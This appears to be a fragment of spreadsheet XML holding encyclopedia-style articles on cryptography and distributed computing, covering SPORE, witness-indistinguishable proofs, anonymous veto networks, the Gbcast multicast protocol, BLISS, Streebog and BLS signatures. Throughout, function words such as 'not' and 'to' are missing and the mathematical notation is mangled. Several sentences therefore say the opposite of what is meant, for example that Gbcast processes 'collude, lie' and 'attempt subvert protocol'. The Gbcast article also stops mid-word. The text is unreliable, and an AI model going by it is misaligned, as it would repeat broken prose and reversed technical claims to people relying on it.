    <t>spore, security protocols open repository, online library security protocols comments links papers. each protocol downloadable variety formats, including rules automatic protocol verification tools. protocols described using logic style used clark jacob, goals. database includes details formal proofs known attacks, references comments, analysis papers. large number protocols listed, including many shown insecure. continuation seminal work john clark jeremy jacob.they seek contributions protocols, links comments. also cryptographic nonce cryptography important books, papers, open problems cryptography. list cryptography topics. public-key cryptography short long lists cryptographers. symmetric-key algorithm references external links spore security protocols open repository</t>
  </si>
  <si>
    <t>Witness-indistinguishable proof</t>
  </si>
  <si>
    <t>witness-indistinguishable proof (wip) variant zero-knowledge proof languages typical zero-knowledge proof statement, prover witness statement input protocol, verifier learn nothing truth statement. wip, zero-knowledge condition weakened, guarantee verifier able distinguish provers different witnesses. particular, protocol leak information witnesses, even leak witness used possible witness. witness-indistinguishable proof systems first introduced feige shamir. unlike zero-knowledge proofs, remain secure multiple proofs performed concurrently. references</t>
  </si>
  <si>
    <t>Anonymous veto network</t>
  </si>
  <si>
    <t>cryptography, anonymous veto network av-net) multi-party secure computation protocol compute boolean-or function. first proposed feng piotr zieliński 2006. this protocol presents efficient solution dining cryptographers problem. related protocol securely computes boolean-count function open vote network ov-net). description participants agree group {\displaystyle \scriptstyle generator {\displaystyle \scriptstyle prime order {\displaystyle \scriptstyle discrete logarithm problem hard. example, schnorr group used. group {\displaystyle \scriptstyle participants, protocol executes rounds. round participant {\displaystyle \scriptstyle selects random value {\displaystyle \scriptstyle x_{i}\,\in _{r}\,\mathbb _{q}} publishes ephemeral public {\displaystyle \scriptstyle g^{x_{i}}} together zero-knowledge proof proof exponent {\displaystyle \scriptstyle x_{i}} detailed description method proofs found 8235. after round, participant computes: {\displaystyle g^{y_{i}}=\prod _{j&lt;i}g^{x_{j}}/\prod _{j&gt;i}g^{x_{j}}} round participant {\displaystyle \scriptstyle publishes {\displaystyle \scriptstyle g^{c_{i}y_{i}}} zero-knowledge proof proof exponent {\displaystyle \scriptstyle c_{i}} here, participants chose {\displaystyle \scriptstyle c_{i}\;=\;x_{i}} want send veto), random value want send (veto). after round participant computes {\displaystyle \scriptstyle \prod g^{c_{i}y_{i}}} vetoed, obtain {\displaystyle \scriptstyle \prod g^{c_{i}y_{i}}\;=\;1} hand, participants vetoed, {\displaystyle \scriptstyle \prod g^{c_{i}y_{i}}\;\neq \;1} protocol design protocol designed combining random public keys structured achieve vanishing effect. case, {\displaystyle \scriptstyle \sum {x_{i}\cdot y_{i}}\;=\;0} example, three participants, {\displaystyle \scriptstyle x_{1}\cdot y_{1}\,+\,x_{1}\cdot y_{2}\,+\,x_{3}\cdot y_{3}\;=\;x_{1}\cdot (-x_{2}\,-\,x_{3})\,+\,x_{2}\cdot (x_{1}\,-\,x_{3})\,+\,x_{3}\cdot (x_{1}\,+\,x_{2})\;=\;0} similar idea, though non-public-key context, traced back david chaum's original solution dining cryptographers problem. references</t>
  </si>
  <si>
    <t>Gbcast</t>
  </si>
  <si>
    <t>gbcast (also known group broadcast) reliable multicast protocol provides ordered, fault-tolerant (all-or-none) message delivery group receivers within network machines experience crash failure. protocol capable solving consensus network unreliable processors, used implement state machine replication. gbcast used standalone manner, support virtual synchrony execution model, case gbcast normally used group membership management other, faster, protocols often favored routine communication tasks. history introduced 1985, gbcast first widely deployed reliable multicast protocol implement state machine replication dynamically reconfigurable membership. although problem treated theoretically various models prior work, gbcast innovated showing multicasts used update replicated data within state machine also used dynamically reconfigure group membership, evolve permit members join leave will, addition removed upon failure. this functionality, together state transfer mechanism used initialize joining members, represents basis virtual synchrony process group execution model. term state machine replication first suggested leslie lamport widely adopted publication survey paper written fred schneider. model covers system deterministic object state machine) replicated series commands applied replicas fault-tolerantly. reconfigurable state machine vary membership, adding members removing ones. some state machine protocols also ride temporary unavailability subset current members without requiring reconfiguration situations arise, including gbcast also paxos, lamport's widely cited protocol state machine replication. state machine replication closely related distributed consensus problem, collection processes must agree upon decision outcome, winner election. particular, shown solution state machine replication problem would also capable solving distributed consensus. consequence, impossibility results distributed consensus apply solutions state machine replication problem. implications finding discussed liveness. gbcast somewhat unusual solutions state machine replication problem closely integrated application replicated. gbcast, contrast, designed multicast implemented library delivers messages group members. lamport, malkhi zhou note reliable multicast protocols durability properties required correctly implement state machine model. gbcast exhibit necessary properties.the gbcast protocol first described 1985 publication discussed infrastructure supporting virtual synchrony model isis toolkit. additional details provided later 1987 journal article, open-source version protocol released cornell developers november year. isis used protocol primarily maintaining membership process groups also offered could called directly end-users. technology became widely used starting 1988, isis system commercialized support became available. commercial support system ended 1998 stratus computer, parent isis distributed systems, refocused purely hardware solutions telecommunications industry. examples systems used isis production settings include york stock exchange, employed approximately decade manage configurable, fault-tolerant self-healing reporting infrastructure trading floor, relay quotes trade reports "back office" systems used exchange overhead display. french traffic control system continues isis; since 1996 system employed create fault-tolerant workstation clusters traffic controllers reliably relay routing updates traffic control centers; time french technology also adopted european systems. navy aegis used isis since 1993 support reliable self-healing communication infrastructure. isis also several hundred production users financial, telecommunications, process control, scada critical infrastructure domains. more details found problem statement fundamental problem solved gbcast this: given initial group members wish support multicast abstraction, permitting members group send messages encode various commands requests. protocol must agree messages deliver, ordering, member group sends message, every member group fail receive message order respect delivered messages. group members changes time member fails joins, gbcast also used maintain group membership means special multicasts delivered application "new view" events, also adjust group membership list maintained gbcast protocol library. application thus sees series membership views start "initial view" particular group member joins, evolve time, ordered respect view-changing events multicast messages. these multicasts delivered non-failed members listed view delivery scheduled, property referred virtual synchrony. network partitions split group disjoint subgroups, creating risk split brain behavior, group members take decision (perhaps, launch rocket) without knowing partition group taken different, conflicting decision. gbcast offers protection threat: protocol ensures progress occurs single primary partition group. thus, network partition arise, subgroup members continue operations, certain stall shut down. should failed member recover partitioning failure caused member incorrectly sensed faulty hence dropped view), communication restored, member rejoin. incarnation number used avoid ambiguity: counter incremented time process joins group, treated part process identifier. given (processor-id, process-id, incarnation-number) tuple joins group once, remains group fails, forced leave time occurred. dynamically reconfigurable system, including gbcast paxos, enter states progress possible. example, could happen operational processes wrongly removed configuration, many real crashes occur within remaining members view. situations, data center management infrastructure responsible restarting entire application. this contrast behavior non-reconfigurable (vanilla) paxos, tolerate disruptions unlimited duration resume enough group members accessible, without intervention management infrastructure. following terms used detailed protocol description. processes processes processors operate arbitrary speed. processes experience crash (halting) failures. process uniquely identified three-tuple: (processor-id, process-id, incarnation-number). processes stable storage re-join protocol failures (following crash-recovery failure model), incrementing incarnation number. processes collude, lie, otherwise attempt subvert protocol. (that byzantine failures occur.) network processes system send messages processes system. messages sent asynchronously: time bound message delivery. messages lost, reordered, duplicated. messages delivered without corruption.these weak assumptions: network never delivers messages would satisfy would network experiencing complete permanent partitioning failure). network conditions required gbcast guarantee progress discussed below. practice gbcast normally used within data centers; networks experience transient failures, partitioning failures rare, generally impact small subsets nodes. thus purposes analysis assume harsher networking environment would arise actual deployments. simplify presentation, assume tcp-like acknowledgement retransmission scheme employed, creating illusion reliable, sequenced, non-repeating message channel pair processes. timeout occurs channel abstraction retries repeatedly unable obtain acknowledgement message. using tcp-like channels, also support 1-to-all capability, whereby single process sends message channels members view group. this done mapping 1-to-all request multiple 1-to-1 messages. notice 1-to-all channels lack atomicity guarantee: sender fails message sent, might reach destinations. process groups views gbcast defined respect "process group:" processes. deployed system group might name (like file name), initially contact group, attributes flow-control parameters. however, kinds details omitted brevity.the term membership view list members, rank-ordered (determined view member recently joined group) ties broken lexicographic ordering rule.the initial membership group specified external agent defines first membership view group.subsequent membership views arise applying remove commands identified sequence number.new views reported processes belonging view means "new view" events. application notified upcall call library handler defined application program). multicast messages members view request multicast messages sent process group without knowledge membership apply time delivery.the gbcast protocol carries operations series guarantees, discussed below.delivery upcall application, perform whatever action message requests. roles gbcast best understood terms roles. application application corresponds program launched processors. each application process joins process groups.an application process belonging group initiates multicasts invoking gbcast. protocol considered terminated members target group either acknowledged delivery message, detected faulty, mechanism explained below.incoming gbcast messages delivered upcalls, view change notifications.as noted earlier, members group observe sequence upcalls starting initially join: initial view sequence views multicast messages. members group receive particular multicast view, multicast delivered non-failed members view. leader leader group defined respect view group, member lowest rank view. noted, rank age-ordered (with older members lower rank), ties broken using lexicographic sort. failure detection components system permitted participate role "detecting" failures. detection distinct reporting failure (which occurs view ordered respect message deliveries).the channel abstraction supported network layer senses failures timeouts. (notice network model, process attempts send message crashed target process always experience timeout, also possible channel abstraction could misreport operational process faulty messages delayed transient partitioning failure).any process experiences timeout declare endpoint associated channel failed.if process learns failure (processor-id, process-id, incarnation-number) tuple, includes information next outgoing message channels.a process considers process failed reject messages failed incarnation, responding "you failed". (that processes gossip failures, shun failed group members).an incoming message incarnation failed process treated message "new" process. failed process member current view detected failed considered failed process. operational process learns considered failed attempting communicate process rejects message, thereby "shunning" might exit system, increase incarnation number rejoin. leader every lower-ranked process current view failed process, next highest-ranked non-failed process designated leader. leader must protocol, discussed below, become leader. quorums quorums used guarantee safety properties gbcast ensuring single globally agreed-upon sequence group views multicast messages preventing progress partition group becomes fragmented partitions (disjoint subsets members communicate members subsets, members subsets). quorums defined specific view. given view members {a,b,c….}, quorum view majority subset members view. notice contrast term defined systems static underlying membership: gbcast, quorum size change time membership group changes views become defined. safety liveness properties order guarantee safety, gbcast defines three safety properties ensures hold, regardless pattern failures: non-triviality only multicasts actually sent group member delivered. process receives message group member considers failed, reject messages. consistency member view delivers multicast reports view) order relative multicasts, members view deliver message report view) order. conditional liveness multicast sent view sender remains operational, eventually members view (with exception crash) deliver liveness cannot guaranteed conditions, hence impose condition: require property sufficiently many processes remain non-faulty (we'll discuss below). basic gbcast this protocol used normal conditions. recall gbcast, operational process current view, view defines leader. only process believes leader current view initiate multicast; members must relay multicasts sending leader, 1-to-1 connections, waiting leader protocol. should leader fail member leader attempting relay multicast, sender must determine status pending request. this accomplished follows: notice members observe delivery multicasts. accordingly, view becomes defined leader failed, either multicast delivered case sender knows receivers), delivery view allows conclude leader failed relay pending message, resent asking leader relay (non-triviality). prepare step leader proposes sequence multicast messages using 1-to-all reliable network layer send message(s) members current view, identifying means integer sequence number. sequence numbers reset view defined (via special kind multicast, explained below). leader "talks itself", participating protocol members. during recovery (discussed below), leader might re-propose previously proposed view message, leader attempts complete protocols leader might started failed complete. when occurs, leader respect original sequencing re-propose identical view message. promise step each recipient retains copy message(s) responds promise deliver (such promise fulfilled long recipient remains member group view, recipient fails, promise might carried out). during recovery, recipient might receive duplicated prepare request message. message re-proposed sequence number, recipient simply repeats promise. commit step leader collects promise messages until, member group, either promise message timeout occurred causing leader suspect corresponding member faulty (recall latter case, leader shun suspected member, message-sending subsystem piggybacks information next messages sends, process receiving subsequent message leader also begin shun newly suspected members).if leader receives promises quorum members, defined respect view running protocol, sends commit request. leader lacks quorum, hence suspects majority group members, never able make progress, leader therefore terminates (the application program rejoin group using process name, progress process view, process name, impossible).notice leader also learned failures prepare phase propose phase.in prepare phase, view members failed acknowledge propose request, case leader's channel members experienced timeouts. leader marked failed members.additionally, case receiving promise messages promise phase, leader learned failed members detected group members. thus, start commit phase, leader quorum promises together possibly empty list failed view members.the leader therefore sends "commit" message non-failed members view, together proposal view change event remove failed member(s) view, thereby combining commit step propose step single actions. recall failure detection occurs, first message member group piggyback failure detection information, members shun failed members. thus members learn failure instantly begin shun failed members, leader takes step starting view change protocol (which take time complete).if proposal changed view adding members, leader sends view joining members; becomes initial view, participate subsequent runs protocol.during recovery, participant might receive duplicated commit previously committed message. enters delivery phase redeliver message view application. delivery step member receives commit message, delivers associated message(s) view(s) application, order proposed leader. leader learns step succeeded acknowledgements used reliable 1-to-1 channel received. message flow: basic gbcast, simplest case (quorum size view1={a,b,c}) member leader members application layer x--------&gt;| request leader send multicast x---------&gt;|-&gt;|-&gt;| propose(1.1: (view sequence message |&lt;---------x--x--x promise(1.1) x---------&gt;|-&gt;|-&gt;| commit(1.1) |&lt;---------x--x--x------&gt;m-&gt;m-&gt;m committed(1.1); delivers error cases basic gbcast simplest error cases members fail, quorum remains active. example below, group consists {a,b,c} playing leader role. fails promise phase timeout occurs within reliable channel leader process leader therefore commits delivery simultaneously initiates protocol remove group, commits, creating view {a,b}. actually failed, rejoin group incarnation number: effect, must rejoin messages rejected instant learns apparent failure: shunned message flow: basic gbcast, failure member leader (quorum size view1={a,b,c}) member leader members application layer x--------&gt;| request(m) x---------&gt;|-&gt;|-&gt;| propose(1.1: fails |&lt;---------x--x promise(1.1) x---------&gt;|-&gt;| commit(1.1); propose(1.2: "remove |&lt;---------x--x---------&gt;m-&gt;m committed(m); delivers promise(1.2) x---------&gt;|-&gt;|-&gt;| commit(1.2); |&lt;---------x--x--x------&gt;v-&gt;v committed(1.2); delivers view2={a,b} notice commit proposal (and piggybacked failure notification) combined single message. this ensures process commits action failure sensed simultaneously learns failure shun associated process, process quickly removed view. crashed, rejoin incrementing incarnation number named requesting added back group leader. appended membership list name, highest rank (because youngest member) among members view. message flow: basic gbcast, members {d,e,f}, failure member leader example shown below, group initially contains members {a,b,c} asked {d,e,f}, member fails protocol. membership change requests treated special kind multicast sequence events same. example thus nearly identical prior one, series view events delivered application. (quorum size view1={a,b,c}) member leader members application layer x--------&gt;| request("add d,e,f") x---------&gt;|-&gt;|-&gt;| propose(1.1: "add d,e,f") fails |&lt;---------x--x promise(1.1) x---------&gt;|-&gt;| commit(1.1); propose(2.1: "remove |&lt;---------x--x-----x--x--x------&gt;v-&gt;v----&gt;v-&gt;v-&gt;v committed(1.1); deliver view2={a,b,c,d,e,f}; promise(2.1) x---------&gt;|-&gt;|----&gt;|-&gt;|-&gt;| commit(2.1) |&lt;---------x--x-----x--x--x------&gt;v-&gt;v----&gt;v-&gt;v-&gt;v committed(2.1); deliver view3={a,b,d,e,f} protocol, active view view3={a,b,d,e,f} quorum size notice "intermediate" view, view2={a,b,c,d,e,f} quorum size leader received promises proposal phase removed would able commit phase view3. this illustrates basic policy: quorum required commit view always based size prior view. takeover protocol, used leader fails next failure case leader fails, resulting leader. take leader, leader first runs takeover protocol, leader basic gbcast above. takeover protocol follows: inquiry step leader sends 1-to-n message interrogating non-failed members learn messages promised deliver. promise-list step each recipient sends current list promised messages leader. recipient lacks initial view, sends request initial view leader.the leader waits either received promise-list members contacted, timed out. timeout occurs, leader suspects member question, shun members contacts. eventually propose view excludes shunned members, explained below. repeat necessary leader examines promise-list, looking membership-change messages members. present, iterates inquiry phase promise-list collection phase, sending inquiries members. this turn could lead discovery additional proposals still members. process terminates every member (current proposed added) responded promise-list suspected leader. check quorums inquiry phase, leader received promise-list responses processes contacted; unresponsive members suspected. leader constructs list proposed views. advance next step take-over proposal, leader must received quorum responses committed proposed views list. failed receive quorum responses committed proposed view list, leader failed take leader never succeed. terminates protocol must rejoin system member, using process incarnation number. start leader having successfully checked quorums, leader becomes leader. basic protocol. re-proposes promised messages view-changes, order learned promise-lists, following view-change command removes leader members failed respond inquiry phase. member responded, promise-list phase, lacks initial view, leader sends appropriate initial view member. dueling leaders possible promise-lists include distinct proposals slot. this happens (only) first leader became partitioned system, nonetheless made proposal seen small (non quorum) members. leader took successfully, learn proposal (which cannot become committed). proposes small minority members. believed failed takes over. possible learn proposals slot. ignore proposal associated older leader, retain proposal associated newer leader, situation, proposal cannot achieved quorum hence cannot become committed, whereas proposal made recent leader, could become committed (otherwise, might reached quorum, would learned hence repeated proposal thus learn must received quorum).note take-over protocol uses deterministic ordering among leaders determine proposal doomed, leader must shunned order become leader. conversely, must assume proposal become committed, even suspected failed, proposal intersected take-over step. rule implemented: numbering leaders sequentially including leader-number proposal. during inquire step, leader proposal leader larger number, receives conflicting proposals slot. failure suspicions piggyback outgoing messages notice leader believes leader failed, also believe members failed. thus, inquiry phase, propose phase, also carry piggybacked failure messages members. this central requirement protocol, ensures members subsequently shunned: communication received shunned member, receiver reject messages. follows member executes promise-list phase leader propose commit messages processed member. from promise-list collected leader complete, containing promised messages could possibly achieved quorum current view. also contain additional promised messages achieved quorum. message flow: basic gbcast, failure leader, takeover, basic gbcast leader (quorum size view 1={a,b,c}) member leader members application layer x-----&gt;| request(m) x------------&gt;|-&gt;| propose(1.1: leader fails send, propose reach *&lt;------------x—-x promise(1.1) (the leader) failed leader: ?------------&gt;|-&gt;| inquire("b taking failed") |&lt;------------x--x promiselists(1.1: x------------&gt;|-&gt;| propose(1.1: propose(1.2: "remove |&lt;------------x--x---------&gt;| promise(1.1); promise(1.2) x------------&gt;|-&gt;|---------&gt;| commit(1.1); commit(1.2); |&lt;------------x--x--------&gt;m;v-&gt;m;v committed(1.1); committed(1.2); delivers(m). delivers view2={b,c} message flow: basic gbcast, members {d,e,f}, failure leader example complex case, leader fails middle commit increases size view (quorum size view 1={a,b,c}) member leader members application layer x-----&gt;| request("add x------------&gt;|-&gt;| propose(1.1) leader fails send, propose reach *&lt;------------x—-x promise(1.1) (the leader) failed leader: ?------------&gt;|-&gt;| inquire("b taking failed") |&lt;------------x--x promiselists(1.1: "add f"); ?-------------|--|-&gt;|-&gt;|-&gt;| iterated inquire("b taking failed") |&lt;------------|--|--x--x--x promiselists(1.1: "add f"); x------------&gt;|-&gt;|-&gt;|-&gt;|-&gt;| propose(1.1: "add f"); propose(2.1: "remove |&lt;------------x--x--x--x--x promise(1.1); promise(2.1); x------------&gt;|-&gt;|-&gt;|-&gt;|-&gt;| commit(1.1); commit(2.1); |&lt;------------x--x-&gt;x-&gt;x-&gt;x --------&gt;v-&gt;v-&gt;v-&gt;v-&gt;v committed(1.1); committed(2.1); delivers view2={a,b,c,d,e,f}. delivers view3={b,c,d,e,f} example inquiry iteration action": learns protocol adds {d,e,f} first phase inquiry, hence repeats inquiry, time contacting there need repeat inquiry since would simply return information previously obtained. example, final commit actually causes views delivered succession members even though proposals sent concurrently, commit view2 requires promise quorum view1, whereas commit view3 requires quorum response members view2. although sending initial views explicitly shown diagram, joining members participate protocol join group view2. notice members pipelining effect arises: events associated view2 already proposed even events view1 still committed. correctness show gbcast satisfies non-triviality start tracing backwards arbitrary delivery action point client requested corresponding event; clearly, messages legitimately sent delivered. however, nontriviality protocol goes further: must also show messages given member delivered member still live participant view. accordingly, look case leader initiates multicast fails delivered. here, leader either discovers pending proposal, order view-change event, leader fails discover pending proposal, case members view shun late-arriving incoming message leader. thus either multicast message delivered view sent still pending, delivered all. establish consistency begin analysis case single leader never fails loses connectivity quorum. since leader sequences events includes member starting first view contains member, members deliver identical messages starting view added system. when leader takes over, inquiry required reach quorum members recent committed view. this quorum necessarily include least process received proposal leader could committed. thus leader learn potentially committed proposal include preflix proposals. follows process delivers event, system makes progress, every surviving member eventually deliver event order. show joining member receive initial view analysis relevant cases. leader fail, sends initial view eventually reliable channel. leader fail member lacks initial view, leader sends view receipt "promise-list" response inquiry-phase message. logical partitioning group impossible shunning rule. order commit view, leader must obtain promises quorum current view. leader, taking over, learn view could become committed. commit proposed next view, thus required interact quorum intermediary view, any. scenario could lead partitioning, leader, might timed gone create sequence views events excluded case majority intermediary view members learned believes failed, shun inquires. either case, prevented obtaining quorum hence cannot make progress. symmetric argument shows succeeds defining view excludes would unable obtain quorum view might attempt propose. liveness gbcast protocol make progress provided times execution, view holds time less quorum members fail suspected failing) within subset members view. maximize progress, important excluded still live members rejoin group, erroneous failure detections cause view shrink persistent manner. however, protocol recover make progress time, every process suspects quorum members current view failed. this property similar "stronger" &lt;&gt;w, "weakest failure detector" achieving consensus, defined chandra toueg. this, consider mutually suspecting quorum arises "too quickly" processes wrongly excluded view rejoin gbcast make progress and, indeed, group need shut restart. arguably, runs would unlikely kinds data centers gbcast typically used, clearly constructed adversarial manner. discussion: failure sensing gbcast protocol presumes probability incorrect failure suspicions low; scheme breaks failure suspicions occur frequently operational processes often suspected faulty. analogy, consider protocol, failure receive acknowledgement eventually cause connection break. used nearly universally, tremendous disruption would result connections frequently break neither endpoint failed. thus timeouts conservatively. similar assumption required systems gbcast. contrast, failure detection schemes, explored chandra toueg, yield high rates incorrect failure suspicions. some protocols, including paxos, able tolerate incorrect failure suspicions without costly consequence. whether approach inherently better beyond scope discussion. simply underscore approaches differ, gbcast would ineffective timeouts overly aggressively. extreme scenario worthy mention: network partitioning events. modern data centers networks often experience events single machine processes becomes transiently partitioned larger pool machines remain connected another. such cases treated failures gbcast, surviving, connected members include sufficiently large number processes, majority portion system simply reconfigure exclude disconnected member. reconnect rejoin group later partition heals. extreme kind partitioning sometimes seen data centers: situation, network switch might fail, causing collection machines (perhaps, whole rack even entire container) become disconnected internet remainder data center. cases could imagine group members begin suspect members; gbcast progress case management infrastructure would need relaunch entire application. hand, large data centers, operating systems machines experiencing failure would also shut down, restarting connectivity restored. thus practice, restart system unavoidable. this said, protocols, paxos, could ride outage machines remain operational later regained adequate connectivity. transis system explored extensions gbcast protocol permit multiple partitions form, make independent progress, remerge. this topic, however, beyond scope present discussion. discussion: dueling leaders paxos protocol, situation arise leaders "duel" proposing different commands slot. this also occur gbcast. normal sequence events, leader takes prior leader failed, learns proposals prior leader made inquiry phase, repeats proposals, extended ones. thus duel content slots arises proposals repeated slots. closest situation duel seen leader become partitioned majority leader, taking over, unable contact members (but obtain required quorum inquire phase). here leader unaware proposals leader made, might still issue, reach members leader contact. shunning mechanism resolves duels. when leader obtained quorum inquire phase, also blocked leader ever achieving quorum propose might initiate: majority members shunning leader. thus proposal missed leader necessarily proposal reach quorum members, reach quorum future. moreover, members aware proposal shunned leader, since (when gave waiting respond inquire) considers failed. member learning proposals leader shun well. shunning leaders gbcast occurs pre-determined order leader ranks: higher-ranking leader shuns lower-ranking leader tries take-over place. paxos ballots mechanism serves precisely purpose, differs allowing participants attempt take-over repeatedly, eaach time assuming ballot ("rank"). result that, hand, paxos leader demotion reversible, other, dueling leaders could theoretically continue forever. bi-simulation equivalence paxos although superficially quite different, upon close study gbcast seen surprisingly similar paxos. indeed, paxos "transformed" gbcast following (reversible) sequence steps. brevity describe steps informally omit detailed proof. note transformation address durability. gbcast treats durable state property application, protocol, whereas paxos logs events durable command logs, hence still recover state even whole service shut restarted. equivalent behavior gbcast involves application received messages, case considered here. start basic paxos protocol. process incarnation number distinguish rejoining process continuously member view. impose age-based ordering members group, designate oldest member (breaking ties lexicographic) leader. non-leaders issue requests leader. both protocols permit batching requests: basic paxos concurrency parameter, alpha: leader concurrently maximum alpha instances protocol. gbcast permits leader propose multiple events single protocol instance, could message deliveries view events. paxos normally require reliable, ordered communication. modify protocol reliable one-to-one channel abstraction one-to-many message would sent paxos one-to-one channels). assume message sent either received delivered order, timeout occur sender side. paxos slot number become gbcast sequence number. paxos ballot number effect, transformed proposing leader-number used discriminate conflicting proposals inquire step. define category view-modifying commands operate adding removing processes group membership. introduce failure detection mechanism used gbcast, asking leader remove timed-out members. member removed group reestablishes connectivity group rejoin incarnation number. report views upcalls application. basic paxos propose multicast quorum group members, hence typical member gaps command list. this why, paxos, learner must read quorum members merge command lists. modified protocol, multicast proposed non-failed members, failed members dropped view. thus unlike paxos, modified protocol property single live member full committed event list. effect, protocol write quorum equal current membership view size, read quorum this convenient building applications maintain actual state database object inconvenient represent state series updates command lists must merged learn actual sequence events.the quorum mechanisms define paxos, including inquiry used paxos leader takes o</t>
  </si>
  <si>
    <t>BLISS signature scheme</t>
  </si>
  <si>
    <t>bliss (short bimodal lattice signature scheme) digital signature scheme proposed ducas, alain durmus, tancrède lepoint vadim lyubashevsky 2013 paper "lattice signature bimodal gaussians". cryptography, digital signature ensures message authentically specific person private create signature, verified using corresponding public key. current signature schemes rely either integer factorization, discrete logarithm elliptic curve discrete logarithm problem, effectively attacked quantum computer. bliss hand, post-quantum algorithm, meant resist quantum computer attacks. compared post-quantum schemes, bliss claims offer better computational efficiency, smaller signature size, higher security. presentation anticipated bliss would become potential candidate standardization, however submitted nist. features lower rejection rate: fiat-shamir lattice signature scheme, bliss improves upon previous ones replacing uniform discrete gaussian sampling bimodal samples, thereby reducing sampling rejection rate. memory-efficient gaussian sampling: paper describing bliss, authors constructed discrete gaussian sampler arbitrary standard deviation, sampler fixed standard deviation rejecting samples based pre-computed bernoulli constants. signature compression: coefficients signature polynomials distributed according discrete gaussian, final signature compressed using huffman coding. also ring learning errors ring learning errors signature references https://web.archive.org/web/20151006213007/http://bliss.di.ens.fr/ https://eprint.iacr.org/2013/383.pdf http://csrc.nist.gov/groups/st/post-quantum-2015/papers/session9-oneill-paper.pdf</t>
  </si>
  <si>
    <t>Streebog</t>
  </si>
  <si>
    <t>streebog (russian: стрибог) cryptographic hash function defined russian national standard gost 34.11-2012 information technology cryptographic information security hash function. created replace obsolete gost hash function defined standard gost 34.11-94, asymmetric reply sha-3 competition national institute standards technology. function also described 6986 hash functions iso/iec 10118-3:2018. description streebog operates 512-bit blocks input, using merkle–damgård construction handle inputs arbitrary size.the high-level structure hash function resembles gost 34.11-94, however, compression function changed significantly. compression function operates miyaguchi–preneel mode employs 12-round aes-like cipher 512-bit block 512-bit key. uses matrix bytes rather aes's matrix.) streebog-256 uses different initial state streebog-512, truncates output hash, otherwise identical. function named streebog stribog, rash wind ancient slavic mythology, often referred name, even though explicitly mentioned text standard. examples streebog hashes hash values empty string. streebog-256("") 3f539a213e97c802cc229d474c6aa32a825a360b2a933a949fd925208d9ce1bb streebog-512("") 8e945da209aa869f0455928529bcae4679e9873ab707b55315f56ceb98bef0a7 362f715528356ee83cda5f2aac4c6ad2ba3a715c1bcd81cb8e9f90bf4c1c1a8a even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period sentence: streebog-256("the quick brown jumps lazy dog") 3e7dea7f2384b6c5a3d0e24aaa29c05e89ddd762145030ec22c71a6db8b2c1f4 streebog-256("the quick brown jumps lazy dog.") 36816a824dcbe7d6171aa58500741f2ea2757ae2e1784ab72c5c3c6c198d71da streebog-512("the quick brown jumps lazy dog") d2b793a0bb6cb5904828b5b6dcfb443bb8f33efc06ad09368878ae4cdc8245b9 7e60802469bed1e7c21a64ff0b179a6a1e0bb74d92965450a0adab69162c00fe streebog-512("the quick brown jumps lazy dog.") fe0c42f267d921f940faa72bd9fcf84f9f1bd7e9d055e9816e4c2ace1ec83be8 2d2957cd59b86e123d8f5adee80b3ca08a017599a9fc1a14d940cf87c77df070 cryptanalysis 2013 russian technical committee standardization "cryptography security mechanisms" participation academy cryptography russian federation declared open competition cryptanalysis streebog hash function, attracted international attention function. describe preimage attack takes 2496 time memory 2504 time memory find single preimage gost-512 reduced rounds. they also describe collision attack 2181 time complexity memory requirement paper. guo, describe second preimage attack full streebog-512 total time complexity equivalent 2266 compression function evaluations, message 2259 blocks.altawy youssef published attack modified version streebog different round constants. while attack direct impact security original streebog hash function, raised question origin used parameters function. designers published paper explaining pseudorandom constants generated streebog-like hash function, provided different natural language input messages.altawy, found 5-round free-start collision 7.75 free-start near collision internal cipher complexities 240, respectively, well attacks compression function 7.75 round semi free-start collision time complexity 2184 memory complexity 8.75 9.75 round semi free-start near collisions time complexities 2120 2196, respectively.wang, describe collision attack compression function reduced rounds 2176 time complexity 2128 memory complexity.in 2015 biryukov, perrin udovenko reverse engineered unpublished s-box generation structure (which earlier claimed generated randomly) concluded underlying components cryptographically weak. also hash function security summary references</t>
  </si>
  <si>
    <t>BLS digital signature</t>
  </si>
  <si>
    <t>digital signature— also known boneh–lynn–shacham (bls)—is cryptographic signature scheme allows user verify signer authentic. scheme uses bilinear pairing verification, signatures elements elliptic curve group. working elliptic curve group provides defense index calculus attacks (with caveat attacks still possible target group {\displaystyle g_{t}} pairing), allowing shorter signatures signatures similar level security. signatures produced signature scheme often referred short signatures, short signatures, simply signatures. signature scheme provably secure (the scheme existentially unforgeable adaptive chosen-message attacks) random oracle model assuming intractability computational diffie–hellman problem diffie–hellman group. pairing functions group group computational diffie–hellman problem intractable decisional diffie–hellman problem efficiently solved. non-degenerate, efficiently computable, bilinear pairings permit groups. {\displaystyle e\colon g\times g\rightarrow g_{t}} non-degenerate, efficiently computable, bilinear pairing {\displaystyle {\displaystyle g_{t}} groups prime order, {\displaystyle {\displaystyle generator {\displaystyle consider instance problem, {\displaystyle {\displaystyle g^{x}} {\displaystyle g^{y}} intuitively, pairing function {\displaystyle help compute {\displaystyle g^{xy}} solution problem. conjectured instance problem intractable. given {\displaystyle g^{z}} check {\displaystyle g^{z}=g^{xy}} without knowledge {\displaystyle {\displaystyle {\displaystyle testing whether {\displaystyle e(g^{x},g^{y})=e(g,g^{z})} holds. using bilinear property {\displaystyle x+y+z} times, {\displaystyle e(g^{x},g^{y})=e(g,g)^{xy}=e(g,g)^{z}=e(g,g^{z})} then, since {\displaystyle g_{t}} prime order group, {\displaystyle xy=z} signature scheme signature scheme consists three functions: generate, sign, verify. generationthe generation algorithm selects random integer {\displaystyle {\displaystyle 0&lt;x&lt;r} private {\displaystyle holder private publishes public key, {\displaystyle g^{x}} signinggiven private {\displaystyle message {\displaystyle compute signature hashing bitstring {\displaystyle {\displaystyle h=h(m)} output signature {\displaystyle \sigma =h^{x}} verificationgiven signature {\displaystyle \sigma public {\displaystyle g^{x}} verify {\displaystyle e(\sigma ,g)=e(h(m),g^{x})} properties simple threshold signatures signature aggregation: multiple signatures generated multiple public keys multiple messages aggregated single signature. unique deterministic: given message, valid signature (like pkcs1 v1.5, eddsa unlike pss, dsa, ecdsa schnorr). applications chia network used signatures 2020, signatures used extensively version (eth2) ethereum blockchain, specified ietf draft signature specification—for cryptographically assuring specific eth2 validator actually verified particular transaction. signatures ethereum considered solution verification bottleneck medium term, signatures quantum secure. over longer term—say, 2025–2030—stark aggregation expected drop-in replacement aggregation. also pairing-based cryptography references external links summary description algorand draft standard effort lynn's library chia network's signatures implementation (c++)</t>
  </si>
  <si>
    <t>Feedback with Carry Shift Registers</t>
  </si>
  <si>
